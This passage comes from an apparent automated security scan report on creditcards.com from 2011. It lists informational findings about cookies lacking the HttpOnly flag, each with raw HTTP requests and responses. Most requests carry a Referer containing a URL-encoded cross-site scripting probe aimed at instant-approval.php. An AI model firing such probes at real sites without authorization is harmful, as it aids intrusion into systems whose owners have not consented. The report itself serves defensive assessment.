Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/credit-card-offer-amex.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309659292548; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/credit-card-offer-amex.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:20:59 GMT
Server: Apache
Last-Modified: Wed, 16 Sep 2009 18:37:26 GMT
ETag: "9e64b0-398-473b630c06580"
Accept-Ranges: bytes
Content-Length: 920
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309659292548; path=/
Set-Cookie: SSBAL=node.web2; path=/

GIF89a)......m.........V.......x............x.R..O../s..N....6..F...........K......`.Y..#...........M.....U...i..j....s....6...r.G..+.....8.....e..
i.8..Z...{..p.>y..d....B..@..'....................
...[SNIP]...

11.354. http://www.creditcards.com/images/credit-card-offer-discover.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/credit-card-offer-discover.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309658653118; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/credit-card-offer-discover.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:20:58 GMT
Server: Apache
Last-Modified: Wed, 16 Sep 2009 18:37:26 GMT
ETag: "7966e1-2a6-473b630c06580"
Accept-Ranges: bytes
Content-Length: 678
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309658653118; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a)........./2......h.......\....wxu..........g%...........W...HIE.r4...XZV.V.ghd...........|..........z@.............]........}......TTP..W.........:<8]_[......#%!........uCEA...qso.........MNJ.
...[SNIP]...

11.355. http://www.creditcards.com/images/credit-card-offer-mastercard.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/credit-card-offer-mastercard.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309659271435; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/credit-card-offer-mastercard.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:20:59 GMT
Server: Apache
Last-Modified: Wed, 16 Sep 2009 18:37:26 GMT
ETag: "7964db-31e-473b630c06580"
Accept-Ranges: bytes
Content-Length: 798
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309659271435; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a)..............S....k......<.]R....2&........u..V........$.#'.{x....qw...................s".......QU....5>.....!.....@.WT....^b...................13.z~..:........%................;@.............
...[SNIP]...

11.356. http://www.creditcards.com/images/credit-card-offer-visa.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/credit-card-offer-visa.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309658952690; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/credit-card-offer-visa.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:20:58 GMT
Server: Apache
Last-Modified: Wed, 16 Sep 2009 18:37:26 GMT
ETag: "796287-1bd-473b630c06580"
Accept-Ranges: bytes
Content-Length: 445
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309658952690; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a)...................".%8.4I..-.GX................y..Sd....ft............ ...........r......@@@xmg......!.......,....)...... .di.(..l..n,.r..v.......d8..,..b.\.....9.$ 'a.........v...Ax`.....N..
...[SNIP]...

11.357. http://www.creditcards.com/images/credit-card-offers.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/credit-card-offers.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309662965382; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/credit-card-offers.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:02 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "796498-3e7-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 999
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309662965382; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a...................r..Tj...................E]..........!.......,.............I..8....`(.di.h..l..p,.tm.x..|....pH,....r.l:.G....Z......
..FW.(....z.n....<.......M...e}j{
.cF~.bu6.e......_A.] ..
...[SNIP]...

11.358. http://www.creditcards.com/images/credit-card-tools.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/credit-card-tools.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309661959193; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/credit-card-tools.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:01 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:32 GMT
ETag: "796604-5a2-4671230c2fd00"
Accept-Ranges: bytes
Content-Length: 1442
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309661959193; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a...............................................................................d..d..c..c..b..b..a..Sv.Sv.Ru.Fl.Dk.Ek.Dj.Dj.Ci.Bh.Ah.5^.3].4].2\.'T&S.R..Q..P..O..N..M..M.L~.L.K}.K~.J}.J|.I|.
...[SNIP]...

11.359. http://www.creditcards.com/images/credit-cards-logo-2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/credit-cards-logo-2.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309659459059; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/credit-cards-logo-2.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:20:59 GMT
Server: Apache
Last-Modified: Fri, 11 Sep 2009 15:18:40 GMT
ETag: "79690c-9cb-4734ed4b33400"
Accept-Ranges: bytes
Content-Length: 2507
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309659459059; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a..U...........zz.::..........ZZ.......)).JJ....jj. ................11..........RR.AA.cc....tt................"!.22.......KK.SS.!!.)).::.BB....ZZ....ff....{{.kk....22....!!.ss....**.............
...[SNIP]...

11.360. http://www.creditcards.com/images/fb-icon.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/fb-icon.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309664390011; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/fb-icon.png HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:04 GMT
Server: Apache
Last-Modified: Mon, 14 Feb 2011 21:27:32 GMT
ETag: "796428-1ef-49c44b7311900"
Accept-Ranges: bytes
Content-Length: 495
Content-Type: image/png
Set-Cookie: Apache=66.219.46.81.1308309664390011; path=/
Set-Cookie: SSBAL=node.web1; path=/

.PNG
.
...IHDR................7....sBIT.....O....lPLTE...~..m..~..m.....~..u...............................................~..x..u..s..m..i..e..Xx.St.Hk.Ei.Ae.=b...~....$tRNS.ff.....................
...[SNIP]...

11.361. http://www.creditcards.com/images/loading.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/loading.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308307493703892; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/loading.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:44:53 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "9e5b21-a65-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 2661
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308307493703892; path=/
Set-Cookie: SSBAL=node.web2; path=/

GIF89a.............t.................!..NETSCAPE2.0.....!.......,...........h...0.I..8....`(.di.h....*....[.F\.2L.6 N.. {.....5...S.ER..,...n...8L...c4.{fz..vq..W.i&;o..xp}ru.I.w.|.~.................
...[SNIP]...

11.362. http://www.creditcards.com/images/menu.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/menu.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309658680055; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/menu.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:20:58 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:32 GMT
ETag: "9e5df9-60e-4671230c2fd00"
Accept-Ranges: bytes
Content-Length: 1550
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309658680055; path=/
Set-Cookie: SSBAL=node.web2; path=/

GIF89a........3f}...Gz...2X. :k...Yy..P..Bs......Gk.....L.k.........<p.Ey<c.Pt........J|(V....d..n.....!J..R.!.......,........... .di.h..E...+.tm'x.......`H,.1.$..l:...t:.X......z...Xl+.yht0hl+....J.
...[SNIP]...

11.363. http://www.creditcards.com/images/new-loading.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/new-loading.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308307387749107; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/new-loading.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:43:07 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:32 GMT
ETag: "7967b9-a8e-4671230c2fd00"
Accept-Ranges: bytes
Content-Length: 2702
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308307387749107; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF87a.."................t...........!..NETSCAPE2.0.....!.......,......"........0.I..8....`(.d..h.....p...l.(].|..;.p8...H...l....r1U..:..P.n..,...{.]h......6.]...w{.....|ey.p.{s....jl.x.........p..].
...[SNIP]...

11.364. http://www.creditcards.com/images/rss-icon.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/rss-icon.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309666441273; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/rss-icon.png HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:06 GMT
Server: Apache
Last-Modified: Mon, 14 Feb 2011 21:27:32 GMT
ETag: "4b6da1-23d-49c44b7311900"
Accept-Ranges: bytes
Content-Length: 573
Content-Type: image/png
Set-Cookie: Apache=66.219.46.81.1308309666441273; path=/
Set-Cookie: SSBAL=node.web2; path=/

.PNG
.
...IHDR................7....sBIT.....O....uPLTE.....]..r..]..r..............................................................~..r..k..i..e..]..X..S..K..E..:..5..0..(..e!...'tRNS...............
...[SNIP]...

11.365. http://www.creditcards.com/images/search-by-credit-quality.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/search-by-credit-quality.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309661375371; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/search-by-credit-quality.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:01 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "796226-805-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 2053
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309661375371; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a........3f....Fz...0Y.....6hXy.
?r.P.......Lq..Dy... R.j...=q.L.Dl...........Bs7_....u..Rw. My...(S~......`.....Ps..Ft@f....*W.......p.....a..y..8f.Im....Mt.....J{<qPu.k..*T....U|....k..q..~..
...[SNIP]...

11.366. http://www.creditcards.com/images/security-lock-dark.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/security-lock-dark.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308307387721497; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/security-lock-dark.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:43:07 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "7968b8-15c-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 348
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308307387721497; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a.........................Ut.c..Fc.......7Uz}..%Em...*Jq...s.....{..bz....k...=gRm./Nu Ait........[~....!.......,............'~J.D.....tKs]MV...h..,..$....
H%s..F..`..\.O.@.. ...b$y\:,...YPp...&.
...[SNIP]...

11.367. http://www.creditcards.com/images/security-lock-light.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/security-lock-light.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308307388954799; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/security-lock-light.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:43:08 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "796548-f6-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 246
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308307388954799; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a.............Fm.....Z..Fz......{...........Vz.h....._..!.......,............H.PxD.].XGh..F(...C)....D..%1,.....F0P.'...b*.....Y..$...8.0..B..X,. .#a........ $Cq..4..rklD...Z .tvOj....~........
...[SNIP]...

11.368. http://www.creditcards.com/images/spacer_light_blue.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/spacer_light_blue.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309666426681; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/spacer_light_blue.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:06 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "9e5a25-3338-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 13112
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309666426681; path=/
Set-Cookie: SSBAL=node.web2; path=/

GIF89a.............!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46.272976, Sat Jan 27 2007 22:37:37 "
...[SNIP]...

11.369. http://www.creditcards.com/images/truste-seal-ctv.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/truste-seal-ctv.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309664248298; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/truste-seal-ctv.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:04 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "79663b-9e0-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 2528
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309664248298; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a3.G....zwx.....<|.9JGHWs/...igg.......................9.....4........;.....t856(&$..6...YVW.....]..>............f.3.....>.....@........L...........z..=..2..i..a........9...FX*......=J'........W.
...[SNIP]...

11.370. http://www.creditcards.com/images/twtr-icon.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/twtr-icon.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309665076044; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/twtr-icon.png HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:05 GMT
Server: Apache
Last-Modified: Mon, 14 Feb 2011 21:27:32 GMT
ETag: "4b6da2-247-49c44b7311900"
Accept-Ranges: bytes
Content-Length: 583
Content-Type: image/png
Set-Cookie: Apache=66.219.46.81.1308309665076044; path=/
Set-Cookie: SSBAL=node.web2; path=/

.PNG
.
...IHDR................7....sBIT.....O....~PLTE...{..j..{..j.....{..n....................................................................{..s..n..j..`..Z..S..P..J..@..?..8..f7y[...*tRNS.ff...
...[SNIP]...

11.371. http://www.creditcards.com/images/yt-icon.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/yt-icon.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309665511231; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/yt-icon.png HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:05 GMT
Server: Apache
Last-Modified: Mon, 14 Feb 2011 21:27:32 GMT
ETag: "4b6da3-341-49c44b7311900"
Accept-Ranges: bytes
Content-Length: 833
Content-Type: image/png
Set-Cookie: Apache=66.219.46.81.1308309665511231; path=/
Set-Cookie: SSBAL=node.web2; path=/

.PNG
.
...IHDR................7....sBIT.....O.....PLTE......................................................................................................................z{.wz.uv.rs....km}...ff...
...[SNIP]...

